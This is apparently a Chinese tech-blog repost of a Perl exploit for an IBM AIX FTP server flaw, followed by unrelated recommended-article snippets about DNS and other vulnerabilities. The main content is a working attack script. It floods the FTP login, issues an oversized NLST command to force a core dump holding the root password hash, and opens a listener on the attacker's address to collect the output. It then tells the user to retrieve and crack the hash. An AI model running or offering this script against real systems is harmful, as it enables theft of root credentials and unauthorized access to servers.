Vuln: IBM AIX FTP Server 'NLST' Command Information Disclosure Vulnerability

最新推荐文章于 2020-07-26 22:45:54 发布
最新推荐文章于 2020-07-26 22:45:54 发布
阅读量713 收藏
点赞数
文章标签: aix command ibm server socket user 
use IO::Socket;
 
$|=1;
 
print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--/n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd/n";
print "BY KINGCOPE/n";
print "JULY 2010/n/n";
 
if ($#ARGV < 1) {
    print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]/n";
    print "SAMPLES:/n";
    print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd/n";
    print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25/n";
    exit;
}
 
$trgt = $ARGV[0];
 
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s//./,/gi;                              
 
if ($ARGV[2] eq "") {
    $user = "ftp"; 
    $pass = "c0deb4b3/@roothash.com";
} else {
    $user = $ARGV[2];
    $passwd = $ARGV[3];
}
                         
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x/n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***/n";
print "/t$x";
print $sock "USER root/r/n";
$x = <$sock>;
print "/t$x";
print $sock "PASS sexy/r/n";
$x = <$sock>;
print "/t$x";
}
 
print "*AIX EXPLOIT* ACCESSING FOLDER***/n";
print $sock "USER $user/r/n";
$x = <$sock>;
print "/t$x";
print $sock "PASS $passwd/r/n";
$x = <$sock>;
print "/t$x";
 
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***/n";
print $sock "CWD pub/r/n";
$x = <$sock>;
print "/t$x";
}
 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "/r/n";
$x = <$sock>;
print "/t$x";
 
print "*AIX EXPLOIT* TRIGGERING COREDUMP***/n";
print $sock "NLST ~" . "A" x 5000 . "/r/n";
$x = <$sock>;
 
while(<$sock>) {
    print;
}
 
print "*AIX EXPLOIT* (SUCCESS)***/n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***/n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!/n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);  
}
## CHEERIO!
cnbird2008
关注
域名缓存侦测(DNS Cache Snooping)技术
02-20 351
域名缓存侦测(DNSCacheSnooping)技术 在企业网络中,通常都会配置DNS服务器,为网络内的主机提供域名解析服务。这些DNS不仅解析自己的私有域名,还会用递归方式,请求公网的DNS解析第三方域名,如bai...
求救
riccfkusbtey的专栏
07-28 507
<br />漏洞扫描工具: Acunetix Web Vulnerability Scanner 6.5<br />漏洞描述:[ dns cache snooping]       The remote DNS server is vulnerable to DNS cache snooping attacks. DNS cache snooping is the process of determining whether a given Resource Record (RR) is (or not)
DNS Cache 服务
11-14
DNS Cache 服务
ledger-app-monero-1.42-vuln:CVE-2020-6861的PoC存储库:Ledger Monero App支出密钥提取
02-04
"ledger-app-monero-1.42-vuln:CVE-2020-6861的PoC存储库:Ledger Monero App支出密钥提取" 这个标题揭示了一个安全漏洞,具体是针对Ledger Monero应用程序的1.42版本,该漏洞被称为CVE-2020-6861。"PoC"(Proof of...
Struts2-Vuln:关于Struts2框架的历史漏洞个人分析文章
04-23
Struts2-Vuln 本系列文章将详细分析 Java 流行框架 Struts2 的历史漏洞,今后关于 Struts2 新的漏洞分析,也将更新于 项目上。该系列仅是笔者初学 Java代码审计 的一些记录,也希望能够帮助到想学习 Java代码审计 的...
jackson-databind-vuln:Jackson Databind漏洞
05-26
Jackson Databind是Java开发中广泛使用的JSON处理库,它允许程序通过对象映射机制将JSON数据转换为Java对象,反之亦然。然而,Jackson Databind存在一系列的安全漏洞,这些漏洞可能导致远程代码执行(RCE)攻击,...
url-shortener-vuln:URL Shortener的问题
03-21
url-shortener-vuln:URL Shortener的问题
github-vuln-scraper:GitHub的漏洞收集器
02-04
GitHub漏洞抓取工具 GitHub的此漏洞收集程序是TU Darmstadt演讲的一部分。 建立 器将用于python环境。 direnv allow pip3 install requirements.txt 用法 请使用您自己的替换conf / config.py中的PERSONAL_ACCESS_...
DNS侦查工具
zhaji001
10-16 3010
DNS简介 访问某网站的时候,我们只需要打开浏览器输入例如:www.baidu.com就可以解析到该网站.为了便于记住不需要输入长长的IP地址去访问,这时DNS把相对应的域名解析成IP地址,这就是DNS域名解析. 关于域名 域名的层次划分用点来分割,最低在左边,高的在右边.例如:www.baidu.com.域名服务是基于UDP实现端口号为53.子域名还划分国家,地区,组织. 域名还需要...
DNS Server远程代码执行漏洞复现(CVE-2020-1350)
谢公子的博客
07-26 5148
漏洞描述 2020年7月15日,微软发布补丁修复了一个标注为远程代码执行的DNS Server漏洞,官方分类为“可蠕虫级”高危漏洞,易受攻击的漏洞有可能通过恶意软件在易受攻击的计算机之间传播,而无需用户干预。CVSS评分10分(即高危且易利用),漏洞编号CVE-2020-1350。未经身份验证的攻击者可以发送特殊构造的数据包到目标DNS Server来利用此漏洞,成功利用此漏洞可能达到远程代码执行的效果。如果域控制器上存在DNS服务,攻击者可利用此漏洞获取到域控制器的系统权限。另外,DNS服务器一..
AIX上的FTP设置(原创)
czmmiao的专栏
02-18 2247
FTP服务 FTP是用于Internet上的控制文件双向传输的协议。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。FTP的主要作用,就是让用户连接上一个远程计算机(这些计算机上运行着FTP服务器程序)查看远程计算机有哪些文件,然后把文件从远程计算机上拷贝到本地计算机,或把本地计算机的文件...
Remote DNS Cache Poisoning——山东大学网络攻防实验
我有一颗五角星
05-13 6212
本次实验的目标是让学生获得远程DNS缓存中毒攻击的第一手经验。DNS(Domain Name System)是互联网的电话簿,其将主机名转换为IP地址,反之亦然。这个转换通过DNS解析完成,且对用户是透明的。DNS Pharming攻击以各种方式操纵此解析过程,意图将用户误导到代替的目的地,而这往往是恶意的。本次实验我们聚焦一种特殊的DNS Pharming攻击,叫作DNS缓存中毒攻击。
DNS Server存在远程代码执行漏洞的安全公告
jtrqs的博客
07-21 4026
近日小编发现在厦门三线服务器中发现的DNS报错的情况,之后在自主搭建的DNS服务器上查看到都是显示漏洞攻击,攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞利用细节已公开,微软公司已发布官方补丁。 一、漏洞情况分析 Microsoft Windows是美国微软公司发布的视窗操作系统。DNS(DomainName Server,域名服务器)是进行域名和对应IP地址的转换服务器。DNS中保存了域名与IP地址映射关系表,以解析消息的域名。 Windows DNS Server远程代码执行漏洞。未经身份
【更新1.0:PoC发布】CVE-2020-1350: Windows DNS Server蠕虫级远程代码执行漏洞通告
爱国小白帽
07-16 9700
0x00 更新概览 2020年07月16日,360CERT监测到 FSecureLabs 发布了 PoC,可造成拒绝服务影响。本次更新标识该漏洞极易可能在短时间内出现大规模攻击态势。 具体更新详情可参考: 漏洞详情 0x01 漏洞背景 2020年07月15日, 360CERT监测发现 微软官方 发布了 Windows DNS Server 的风险通告,该漏洞编号为 CVE-2020-1350,漏洞等级:严重。 Windows DNS Server` 存在 `远程代码执行漏洞`,`远程攻击者` 通过 `向受.
Dnsmasq 2.66 发布,DNS缓存工具
weixin_33704591的博客
04-18 169
DNS轻量级缓存服务dnsmasq发布2.65版本。2013-04-17 上一个版本是2012-12-14的2.65。可以用它做DNS代理缓存及hosts主机名的集中管理使用(也可以做DHCP),非常好用。 此版本经过5个RC,修正几个Bug.可以作为认证的DNS server等。 DNSmasq是一个轻巧的,容易使用的DNS服务工具,它可以应用在内部网和Internet连接的时候的IP地址NA...
lepton vuln
最新发布
09-01
Lepton Vuln(轻子漏洞)是指在计算机系统或者网络应用中,由于软件设计不当或实现缺陷而产生的安全漏洞。轻子漏洞可能出现在操作系统、数据库、网络设备、应用程序等软件产品中,它们可以使攻击者通过各种技术手段...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值